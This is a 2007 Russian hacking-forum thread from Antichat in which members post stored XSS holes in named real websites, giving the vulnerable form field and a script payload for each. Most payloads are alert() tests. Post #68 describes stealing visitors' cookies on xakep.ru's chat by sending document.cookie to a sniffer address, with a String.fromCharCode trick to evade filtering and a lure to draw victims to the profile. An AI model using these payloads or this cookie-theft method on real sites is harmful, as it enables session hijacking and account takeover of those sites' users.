ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 07.06.2007, 11:35
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

Хэк в индексе=) поле Адрес сайта
http://hackyou.ru/
описание тут
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
 
Ответить с цитированием

www.web-hack.ru
  #62  
Старый 12.06.2007, 23:47
_Pantera_
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
Провел на форуме:
3025546

Репутация: 1327
Отправить сообщение для _Pantera_ с помощью ICQ
По умолчанию www.web-hack.ru

www.web-hack.ru --> добавить новость

Вбиваем все данные на фонарь кроме кода, его вводим правильно. В саму новость(textarea) пишем:
Код:
<script>alert(document.cookie)</script>
и жмем кнопочку добавить (Аdd)

ps Как выяснилось, она является активной.
 
Ответить с цитированием

  #63  
Старый 13.06.2007, 04:12
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию

www.wikiupload.com
Заливаем любой файл...в описание пишем
Код:
'"><script>alert(/xss/)</script>
Кнопочку "upload" жмем...
Выдается 2 ссылки, одна на скачку, другая на комментарии файла..
Идем в каменты и видим хсс
Пример
Код:
http://www.wikiupload.com/comment.php?id=158669
 
Ответить с цитированием

  #64  
Старый 13.06.2007, 19:58
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
Отправить сообщение для DimOnOID с помощью ICQ
Wink

chatcity.ru

Ну вообщем то........вроде чаты на chatcity


Поля:
E-mail
web-страничка

Вот один пример на volchat.ru
Код:
http://volchat.ru/people/pp0.cgi?c=13397&cn=trane___
 
Ответить с цитированием

  #65  
Старый 14.06.2007, 13:55
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

narod.yandex.ru

Пишем письмо в сообщество, уязвимо поле "Ваш сайт:"

<script>alert('123');</script>

Последний раз редактировалось freddi; 16.06.2007 в 23:29..
 
Ответить с цитированием

  #66  
Старый 16.06.2007, 23:26
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

nm.ru

прикрепляем к письму файл txt или pdf со скриптом.
 
Ответить с цитированием

  #67  
Старый 17.06.2007, 17:45
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

www.xyligan.ru

уязвимо поле "имя"))))

зы это из компании Хакера
ззы пассивных там полно.
 
Ответить с цитированием

  #68  
Старый 17.06.2007, 21:34
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

www.xakep.ru

хсс в чате

уязвимо любое поле, но только одно, там нет ограничения на кол-во символов, но стоит фильтрация символов:
" ? +
это можно спокойно обойти через String.fromCharCode()
сам код идет в виде

"onmouseover="navigate('адрес_снифера' .concat(document.cookie))"
или просто
"onmouseover="alert('xss')"

кодируем
navigate('адрес_снифера'.concat(docume nt.cookie))
с помощью http://ha.ckers.org/xss.html
получится примерно

Цитата:
&#x6E;&#x61;&#x76;&#x69;&#x67;&#x61;&#x74;&#x65 ;
и пишем в виде

"onmouseover="String.fromCharCode(то что закодировали)"

ну чтоб все заработало там ставится галка "Допустить других к просмотру профайла" и говорим посмотрите мой профиль вот так)

зы спс DimOnOID за небольшую помощь)

Последний раз редактировалось freddi; 19.06.2007 в 20:57..
 
Ответить с цитированием

  #69  
Старый 28.06.2007, 19:39
V.I.P
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869

Репутация: 136
Отправить сообщение для V.I.P с помощью ICQ
Smile

www.panvasoft.com
Весьма популярный,посещаемый сайт.
потставляем "><script>alert()</script> во все поля в коментариях.

Пример:http://panvasoft.com/rus/11970/gb/


www.hpclub.ru
Добавление комментарий
"><script>alert()</script>

Пример:http://www.hpclub.ru/news.php3?cID=4

www.consultclub.biz

Добавление комментарий
"><script>alert()</script>[/B]

Последний раз редактировалось V.I.P; 28.06.2007 в 20:19..
 
Ответить с цитированием

  #70  
Старый 29.06.2007, 16:30
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

www.lektravi.ru
Интернет магазин Лекарственные травы
Травки не желаете....=)
Активка в гостевой, при добавлении сообщения в поле почта пишем
Код:
'><script>alert("ShaDow");</script>
пример
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ